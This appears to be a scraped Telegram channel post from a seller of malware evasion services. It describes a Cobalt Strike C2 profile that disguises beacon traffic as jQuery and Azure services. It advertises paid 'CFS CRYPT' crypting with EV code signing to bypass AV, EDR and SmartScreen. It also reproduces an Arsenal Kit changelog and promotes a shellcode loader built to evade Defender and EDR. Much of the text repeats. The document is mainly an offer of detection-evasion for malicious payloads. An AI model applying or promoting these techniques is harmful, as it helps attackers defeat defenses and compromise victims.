Evasion through traffic simulation
- Added "msrpc-azure" and an easy-to-use MIME type (yin+xml, vnd.fly, application/javascript) and headers from IIS 10.0/ASP.NET/IBM_HTTP_Server. It disguises itself as an enterprise stack (Azure AD, legacy WebDAV, NETCONF).
- jQuery v3.4.1 + jQuery UI v1.12.1 add/do not add is a powerful tool for disguising responses as legal JS libraries. As for EDR/proksi, they are focused on a "C2-like" tracker.
- URIs like /compare/v1.44/VXK7P0GBE8 and /Build/v1.85/JDX894ZM2WF1 — (version + token).
- Metadata/identifier from the cookie (SESSIONID_...=) and parameters (_KZZUEUVN=).
Data obfuscation
- mask + 64url base/netbiosu — double/triple streamlining. Netbiosu (upper case) case-sensitive.
Process-input-stage
- virtual resource allocator + HeapAlloc for BOF.
- startrwx/userwx is "false" — simulates RWX signatures (EDR as a defender levitates on this).
- bof_reuse_memory "true" + min_alloc 16384 — writes part of the data.
- NOP/junk conversions (with the addition of "\x90\x90" in x86, "long list" in x64) — textual code zeroing.
- the initial stage of the "false" check is another OPSEC that does not contain a payload on C2 (reduces the scanning speed of the server).
Sleep и jitter
- waiting time of 30,000 ms (30 sec) + 33% jitter — automatically (selects the detector on "fast C2").
OPSEC
- channel name "Winsock2\CatalogChangeListener-####-0" — custom that runs system channels (Windows Winsock).
- user agent "<RAND>" — random in IE style
- ssh_banner Ubuntu + castom pipe — password for SSH post-ex (evasion in Linux/hybrid environment).
- tasks_max_remote_size 2 MB — issues an OPSEC warning about large payloads.
- create_remote_thread/hijack_remote_thread "true" — avoiding intercepting the stream.
- https-certificate - Azure-mimic (CN "*.azureedge.net ") — to bypass TLS.
https://github.com/cfs0x/Evasion-Profiles
- Added "msrpc-azure" and an easy-to-use MIME type (yin+xml, vnd.fly, application/javascript) and headers from IIS 10.0/ASP.NET/IBM_HTTP_Server. It disguises itself as an enterprise stack (Azure AD, legacy WebDAV, NETCONF).
- jQuery v3.4.1 + jQuery UI v1.12.1 add/do not add is a powerful tool for disguising responses as legal JS libraries. As for EDR/proksi, they are focused on a "C2-like" tracker.
- URIs like /compare/v1.44/VXK7P0GBE8 and /Build/v1.85/JDX894ZM2WF1 — (version + token).
- Metadata/identifier from the cookie (SESSIONID_...=) and parameters (_KZZUEUVN=).
Data obfuscation
- mask + 64url base/netbiosu — double/triple streamlining. Netbiosu (upper case) case-sensitive.
Process-input-stage
- virtual resource allocator + HeapAlloc for BOF.
- startrwx/userwx is "false" — simulates RWX signatures (EDR as a defender levitates on this).
- bof_reuse_memory "true" + min_alloc 16384 — writes part of the data.
- NOP/junk conversions (with the addition of "\x90\x90" in x86, "long list" in x64) — textual code zeroing.
- the initial stage of the "false" check is another OPSEC that does not contain a payload on C2 (reduces the scanning speed of the server).
Sleep и jitter
- waiting time of 30,000 ms (30 sec) + 33% jitter — automatically (selects the detector on "fast C2").
OPSEC
- channel name "Winsock2\CatalogChangeListener-####-0" — custom that runs system channels (Windows Winsock).
- user agent "<RAND>" — random in IE style
- ssh_banner Ubuntu + castom pipe — password for SSH post-ex (evasion in Linux/hybrid environment).
- tasks_max_remote_size 2 MB — issues an OPSEC warning about large payloads.
- create_remote_thread/hijack_remote_thread "true" — avoiding intercepting the stream.
- https-certificate - Azure-mimic (CN "*.azureedge.net ") — to bypass TLS.
https://github.com/cfs0x/Evasion-Profiles
Microsoft
ASP.NET Core, an open-source web development framework | .NET
Build web apps and services that run on Windows, Linux, and macOS using C#, HTML, CSS, and JavaScript. Get started for free on Windows, Linux, or macOS.
Prices for CFS CRYPT data plans are dynamic and may change depending on the current infrastructure load, target audience, and market conditions.
The indicated prices are valid at the moment, but may increase or decrease depending on these factors.
Over time, exclusive technologies and solutions will be added to each tariff plan, which will remain available exclusively for this plan.
Your [code] EV Code Signing + CFS CRYPT :
Bypass AV / EDR / Smartscreen / Chrome alert
- 175💵 1st file,
- 250💵 2 file,
- 350💵 3 file,
- 450💵 4 file,
- 550💵 week unlimited.
- 3k💵 Month unlimited.
If you work with large volumes or are a regular customer, we are ready to offer you more favorable conditions.
Warranty is always a priority for us, not an option, but a standard of work, regardless of the amount, tariff or terms of the transaction.
The indicated prices are valid at the moment, but may increase or decrease depending on these factors.
Over time, exclusive technologies and solutions will be added to each tariff plan, which will remain available exclusively for this plan.
Your [code] EV Code Signing + CFS CRYPT :
Bypass AV / EDR / Smartscreen / Chrome alert
- 175
- 250
- 350
- 450
- 550
- 3k
If you work with large volumes or are a regular customer, we are ready to offer you more favorable conditions.
Warranty is always a priority for us, not an option, but a standard of work, regardless of the amount, tariff or terms of the transaction.
We provide firm guarantees that you get exactly what you pay for, in full and on time.
Please open Telegram to view this post
VIEW IN TELEGRAM
# Arsenal Kit 20251122
e5e99066e154b623526c7620ea226c99bf68371d9d9ef4597c404c701e6a06f3 arsenal-kit20251122.tgz November 2025 - Cobalt Strike 4.12
-------------
+ Added drip-loader support.
Added drip-loading in beacon for memory allocation/process inject.
Added drip-loading in the reflective loader.
Changed ALLOCATED_MEMORY_* structures (USER_DATA.version 4.12 requires updated structures - breaking change for sleepmask).
Added UDC2 beacons for User Defined Command and Control (UDC2).
Added task IDs to associate task/command input and retrieved output in logs.
Added results from File Browser list files (ls) and Process Browser list processes (ps) to beacon logs.
Process Injection Overhaul
Added injection techniques in the client.
Added PROCESS_INJECT_EXPLICIT_USER and PROCESS_INJECT_SPAWN_USER aggressor hooks for adding user-defined injections to the UI.
+ Added REST API server [BETA]
Introduced a new REST API server designed to run alongside the team server, providing access to Cobalt Strike functionality via REST.
Enhanced the team server to add task tracking to support task/response relationships through the REST API.
Enabled centralized artifact management through the REST API.
Added SOCKS5 IPv6 support which is limited to TCP.
BOF Improvements
Added an API for BeaconDownload.
Updated to use Dynamic Import which removes the limits on the number of Beacon Object File Imports.
+ Updated pivot beacons (SMB and TCP) to use overlapped IO for named pipes/sockets (breaking change with previous versions).
Updated and simplified the sleepmask entry point.
+ GUI Overhaul
Switched look and feel from Synthetica to FlatLNF.
Added new look and feel themes.
Replaced various product icons.
Replaced "colorPanel" aggressor function with "colorMenu".
Updated beacon session list external column link/unlink text symbol to an icon.
Updated File Browser tree to wait until previous click completes loading before accepting another click (double-loading).
Added labels to pivot graph links.
Updated SSH beacon to work on newer Linux distros.
Added new UAC bypasses.
Added "beacon_info" command to list beacon memory information.
Updated beacon cleanup and exit procedures.
Fixed help for "beacon_config".
Fixed issue preventing BEACON_RDLL_GENERATE_LOCAL hook from firing.
Fixed issue with tasks larger than Task Max Size to crash beacon.
Updated java dependencies from Java 11 to Java 17.
- Removed support for the StompLoader.
The classic C++ shellcode loader for Windows, written to maximize the bypass of antiviruses and sandboxes (including Microsoft Defender, EDR systems like CrowdStrike, SentinelOne, etc.).
this is code that takes prepared shellcode (small machine code — payload), places it in memory and executes it without creating a new thread and without explicitly calling CreateThread/QueueUserAPC to be as quiet as possible. a tool for converting PE files (EXE/DLL) into position-independent shellcode https://github.com/CBLabresearch/Clematis
this is code that takes prepared shellcode (small machine code — payload), places it in memory and executes it without creating a new thread and without explicitly calling CreateThread/QueueUserAPC to be as quiet as possible. a tool for converting PE files (EXE/DLL) into position-independent shellcode https://github.com/CBLabresearch/Clematis
GitHub
GitHub - CBLabresearch/Clematis: PE to shellcode
PE to shellcode. Contribute to CBLabresearch/Clematis development by creating an account on GitHub.